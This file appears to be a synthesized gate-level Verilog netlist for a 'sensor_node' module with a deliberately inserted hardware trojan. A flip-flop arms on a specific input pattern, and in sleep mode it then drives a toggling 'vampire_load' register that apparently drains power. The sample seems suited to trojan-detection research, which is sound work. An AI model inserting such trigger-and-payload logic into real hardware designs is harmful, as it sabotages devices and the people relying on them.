/* Generated by Yosys 0.33 (git sha1 2584903a060) */

module sensor_node(clk, rst, sleep_mode, data_in, data_out);
  wire _000_;
  wire _001_;
  wire _002_;
  wire _003_;
  wire _004_;
  wire _005_;
  wire _006_;
  wire _007_;
  wire _008_;
  wire _009_;
  wire _010_;
  wire _011_;
  wire _012_;
  wire _013_;
  wire _014_;
  wire _015_;
  wire _016_;
  wire _017_;
  wire _018_;
  wire _019_;
  wire _020_;
  wire _021_;
  wire _022_;
  wire _023_;
  wire _024_;
  wire _025_;
  wire _026_;
  wire _027_;
  wire _028_;
  wire _029_;
  wire _030_;
  wire _031_;
  wire _032_;
  wire _033_;
  wire _034_;
  wire _035_;
  wire _036_;
  wire _037_;
  wire _038_;
  wire _039_;
  wire _040_;
  wire _041_;
  wire _042_;
  wire _043_;
  wire _044_;
  wire _045_;
  wire _046_;
  wire _047_;
  wire _048_;
  wire _049_;
  wire _050_;
  wire _051_;
  wire _052_;
  wire _053_;
  wire _054_;
  wire _055_;
  wire _056_;
  wire _057_;
  wire _058_;
  wire _059_;
  wire _060_;
  wire _061_;
  wire _062_;
  wire _063_;
  wire _064_;
  wire _065_;
  wire _066_;
  wire _067_;
  wire _068_;
  wire _069_;
  wire _070_;
  input clk;
  wire clk;
  input [7:0] data_in;
  wire [7:0] data_in;
  output [7:0] data_out;
  wire [7:0] data_out;
  input rst;
  wire rst;
  input sleep_mode;
  wire sleep_mode;
  wire trojan_armed;
  wire trojan_sink;
  wire [3:0] vampire_load;
  INV_X1 _071_ (
    .A(trojan_armed),
    .ZN(_031_)
  );
  INV_X1 _072_ (
    .A(data_in[0]),
    .ZN(_032_)
  );
  INV_X1 _073_ (
    .A(data_in[4]),
    .ZN(_033_)
  );
  INV_X1 _074_ (
    .A(data_in[1]),
    .ZN(_034_)
  );
  INV_X1 _075_ (
    .A(data_in[2]),
    .ZN(_035_)
  );
  INV_X1 _076_ (
    .A(rst),
    .ZN(_017_)
  );
  AOI21_X1 _077_ (
    .A(data_in[2]),
    .B1(_034_),
    .B2(data_in[0]),
    .ZN(_036_)
  );
  OAI211_X1 _078_ (
    .A(data_in[3]),
    .B(_035_),
    .C1(data_in[1]),
    .C2(_032_),
    .ZN(_037_)
  );
  NOR2_X1 _079_ (
    .A1(_033_),
    .A2(_037_),
    .ZN(_038_)
  );
  NOR3_X1 _080_ (
    .A1(_033_),
    .A2(data_in[5]),
    .A3(_037_),
    .ZN(_039_)
  );
  NAND2_X1 _081_ (
    .A1(data_in[6]),
    .A2(_039_),
    .ZN(_040_)
  );
  XOR2_X1 _082_ (
    .A(data_in[7]),
    .B(_040_),
    .Z(_041_)
  );
  XNOR2_X1 _083_ (
    .A(data_in[6]),
    .B(_039_),
    .ZN(_042_)
  );
  XOR2_X1 _084_ (
    .A(data_in[5]),
    .B(_038_),
    .Z(_043_)
  );
  XNOR2_X1 _085_ (
    .A(_033_),
    .B(_037_),
    .ZN(_044_)
  );
  XNOR2_X1 _086_ (
    .A(data_in[3]),
    .B(_036_),
    .ZN(_045_)
  );
  NOR3_X1 _087_ (
    .A1(_032_),
    .A2(data_in[1]),
    .A3(_035_),
    .ZN(_046_)
  );
  OR2_X1 _088_ (
    .A1(_036_),
    .A2(_046_),
    .ZN(_047_)
  );
  NAND4_X1 _089_ (
    .A1(_032_),
    .A2(data_in[3]),
    .A3(data_in[1]),
    .A4(data_in[2]),
    .ZN(_048_)
  );
  OR4_X1 _090_ (
    .A1(_042_),
    .A2(_043_),
    .A3(_044_),
    .A4(_048_),
    .ZN(_049_)
  );
  OAI21_X1 _091_ (
    .A(_031_),
    .B1(_041_),
    .B2(_049_),
    .ZN(_000_)
  );
  XOR2_X1 _092_ (
    .A(vampire_load[1]),
    .B(vampire_load[0]),
    .Z(_050_)
  );
  XNOR2_X1 _093_ (
    .A(vampire_load[3]),
    .B(vampire_load[2]),
    .ZN(_051_)
  );
  XNOR2_X1 _094_ (
    .A(_050_),
    .B(_051_),
    .ZN(trojan_sink)
  );
  MUX2_X1 _095_ (
    .A(data_in[0]),
    .B(data_out[0]),
    .S(sleep_mode),
    .Z(_018_)
  );
  XOR2_X1 _096_ (
    .A(data_in[0]),
    .B(data_in[1]),
    .Z(_052_)
  );
  MUX2_X1 _097_ (
    .A(_052_),
    .B(data_out[1]),
    .S(sleep_mode),
    .Z(_019_)
  );
  NAND2_X1 _098_ (
    .A1(sleep_mode),
    .A2(data_out[2]),
    .ZN(_053_)
  );
  OAI21_X1 _099_ (
    .A(_053_),
    .B1(_047_),
    .B2(sleep_mode),
    .ZN(_020_)
  );
  NAND2_X1 _100_ (
    .A1(sleep_mode),
    .A2(data_out[3]),
    .ZN(_054_)
  );
  OAI21_X1 _101_ (
    .A(_054_),
    .B1(_045_),
    .B2(sleep_mode),
    .ZN(_021_)
  );
  NAND2_X1 _102_ (
    .A1(sleep_mode),
    .A2(data_out[4]),
    .ZN(_055_)
  );
  OAI21_X1 _103_ (
    .A(_055_),
    .B1(_044_),
    .B2(sleep_mode),
    .ZN(_022_)
  );
  NAND2_X1 _104_ (
    .A1(sleep_mode),
    .A2(data_out[5]),
    .ZN(_056_)
  );
  OAI21_X1 _105_ (
    .A(_056_),
    .B1(_043_),
    .B2(sleep_mode),
    .ZN(_023_)
  );
  NAND2_X1 _106_ (
    .A1(sleep_mode),
    .A2(data_out[6]),
    .ZN(_057_)
  );
  OAI21_X1 _107_ (
    .A(_057_),
    .B1(_042_),
    .B2(sleep_mode),
    .ZN(_024_)
  );
  MUX2_X1 _108_ (
    .A(_041_),
    .B(data_out[7]),
    .S(sleep_mode),
    .Z(_025_)
  );
  NAND2_X1 _109_ (
    .A1(trojan_armed),
    .A2(sleep_mode),
    .ZN(_058_)
  );
  XOR2_X1 _110_ (
    .A(_004_),
    .B(data_in[0]),
    .Z(_059_)
  );
  MUX2_X1 _111_ (
    .A(_059_),
    .B(vampire_load[0]),
    .S(_058_),
    .Z(_026_)
  );
  XOR2_X1 _112_ (
    .A(_003_),
    .B(_052_),
    .Z(_060_)
  );
  MUX2_X1 _113_ (
    .A(_060_),
    .B(vampire_load[1]),
    .S(_058_),
    .Z(_027_)
  );
  XNOR2_X1 _114_ (
    .A(_002_),
    .B(_047_),
    .ZN(_061_)
  );
  MUX2_X1 _115_ (
    .A(_061_),
    .B(vampire_load[2]),
    .S(_058_),
    .Z(_028_)
  );
  XNOR2_X1 _116_ (
    .A(_001_),
    .B(_045_),
    .ZN(_030_)
  );
  MUX2_X1 _117_ (
    .A(_030_),
    .B(vampire_load[3]),
    .S(_058_),
    .Z(_029_)
  );
  INV_X1 _118_ (
    .A(rst),
    .ZN(_016_)
  );
  INV_X1 _119_ (
    .A(rst),
    .ZN(_015_)
  );
  INV_X1 _120_ (
    .A(rst),
    .ZN(_014_)
  );
  INV_X1 _121_ (
    .A(rst),
    .ZN(_013_)
  );
  INV_X1 _122_ (
    .A(rst),
    .ZN(_012_)
  );
  INV_X1 _123_ (
    .A(rst),
    .ZN(_011_)
  );
  INV_X1 _124_ (
    .A(rst),
    .ZN(_010_)
  );
  INV_X1 _125_ (
    .A(rst),
    .ZN(_009_)
  );
  INV_X1 _126_ (
    .A(rst),
    .ZN(_008_)
  );
  INV_X1 _127_ (
    .A(rst),
    .ZN(_007_)
  );
  INV_X1 _128_ (
    .A(rst),
    .ZN(_006_)
  );
  INV_X1 _129_ (
    .A(rst),
    .ZN(_005_)
  );
  DFFR_X1 _130_ (
    .CK(clk),
    .D(_018_),
    .Q(data_out[0]),
    .QN(_070_),
    .RN(_005_)
  );
  DFFR_X1 _131_ (
    .CK(clk),
    .D(_019_),
    .Q(data_out[1]),
    .QN(_069_),
    .RN(_006_)
  );
  DFFR_X1 _132_ (
    .CK(clk),
    .D(_020_),
    .Q(data_out[2]),
    .QN(_068_),
    .RN(_007_)
  );
  DFFR_X1 _133_ (
    .CK(clk),
    .D(_021_),
    .Q(data_out[3]),
    .QN(_067_),
    .RN(_008_)
  );
  DFFR_X1 _134_ (
    .CK(clk),
    .D(_022_),
    .Q(data_out[4]),
    .QN(_066_),
    .RN(_009_)
  );
  DFFR_X1 _135_ (
    .CK(clk),
    .D(_023_),
    .Q(data_out[5]),
    .QN(_065_),
    .RN(_010_)
  );
  DFFR_X1 _136_ (
    .CK(clk),
    .D(_024_),
    .Q(data_out[6]),
    .QN(_064_),
    .RN(_011_)
  );
  DFFR_X1 _137_ (
    .CK(clk),
    .D(_025_),
    .Q(data_out[7]),
    .QN(_063_),
    .RN(_012_)
  );
  DFFR_X1 _138_ (
    .CK(clk),
    .D(_026_),
    .Q(vampire_load[0]),
    .QN(_004_),
    .RN(_013_)
  );
  DFFS_X1 _139_ (
    .CK(clk),
    .D(_027_),
    .Q(vampire_load[1]),
    .QN(_003_),
    .SN(_014_)
  );
  DFFR_X1 _140_ (
    .CK(clk),
    .D(_028_),
    .Q(vampire_load[2]),
    .QN(_002_),
    .RN(_015_)
  );
  DFFS_X1 _141_ (
    .CK(clk),
    .D(_029_),
    .Q(vampire_load[3]),
    .QN(_001_),
    .SN(_016_)
  );
  DFFR_X1 _142_ (
    .CK(clk),
    .D(_000_),
    .Q(trojan_armed),
    .QN(_062_),
    .RN(_017_)
  );
endmodule
